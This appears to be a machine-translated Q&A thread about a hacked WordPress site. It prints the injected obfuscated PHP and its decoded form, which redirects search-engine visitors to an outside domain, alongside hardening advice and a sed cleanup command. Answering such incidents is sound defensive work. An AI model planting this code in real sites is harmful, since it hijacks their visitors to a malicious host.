WordPress网站Comprimised Hack

时间:2012-02-07 12:56:52

标签: php wordpress

我们为客户端运行的WordPress网站已被编译并正在尝试确定他们可能如何进入。似乎他们已将代码注入到每个WP核心文件,所有主题文件和仅少数选择插件文件中。

他们使用的代码是:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

有没有人见过或听过这个?有没有人知道如何发生这种情况的线索?所有WP文件权限都设置为建议的级别。

感谢您的时间。

5 个答案:

答案 0 :(得分:3)

我看到这种情况最常见的方式是人们将所有文件和文件夹设置为777.如果你必须为你的wp-content / uploads文件夹执行此操作,请确保你有.htaccess指令阻止脚本在那里执行。您的文件和文件夹应具有运行所需的最低权限(文件644,文件夹755)。

答案 1 :(得分:2)

您还必须完成这些WP链接中的所有说明,以彻底清除安装并防止将代码注入WP核心或模板文件:请参阅FAQ: My site was hacked « WordPress CodexHow to completely clean your hacked wordpress installation以及{{3 }和How to find a backdoor in a hacked WordPress告诉您的主机并更改所有密码。也可能改变主机;一些共享主机比其他主机更容易受到攻击。

这一直没有用,因为它取决于整体服务器和Web主机参数,这些参数在廉价的共享主机上可能会使它们容易受到攻击,但您可以尝试使用这些参数来保护.htaccess和wp-config.php:< / p>

<Files .htaccess>
order deny,allow
deny from all
</Files>

<Files wp-config.php>
order allow,deny
deny from all
</Files>

在.htaccess。

答案 2 :(得分:1)

前几天我遇到了这个问题,发现sed非常有用于清理垃圾。它附加到每个开放的PHP标记,并经常在行的末尾留下代码,因此需要一些仔细的配置。

我相信这是我使用的命令,但要小心,毕竟这是sed; - )......

find . -name "*.php" -type f -exec sed -i 's/eval(.*));//' {} \;

答案 3 :(得分:1)

那么,下面的代码是将您的用户重定向到黑名单的恶意软件网站?那是你正在经历的吗?

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
            header("Location: http://costabrava.bee.pl/");
            exit();
            }
        }
    }
}

你的Wordpress版本可能容易受到XSS攻击。此链接讨论它。 http://www.ethicalhack3r.co.uk/security/wordpress-3-3-cross-site-scripting-xss/

你在哪个版本?

答案 4 :(得分:1)

我有完全相同的问题。

我猜这个网站是通过小部件感染的,因为我使用了一个允许执行PHP代码的插件。

我最好的解决方案是:

  • 消除可疑小部件。
  • 查看一个受感染文件的时间和日期(我的情况:header.php)。
  • 清除所有受感染的文件(在我的情况下,我有一个网站备份)。
  • 当时在日志文件中搜索可疑IP(搜索结果 黑名单上的IP。)
  • 安装一个插件以禁止可疑IP。

从那一刻起问题就消失了。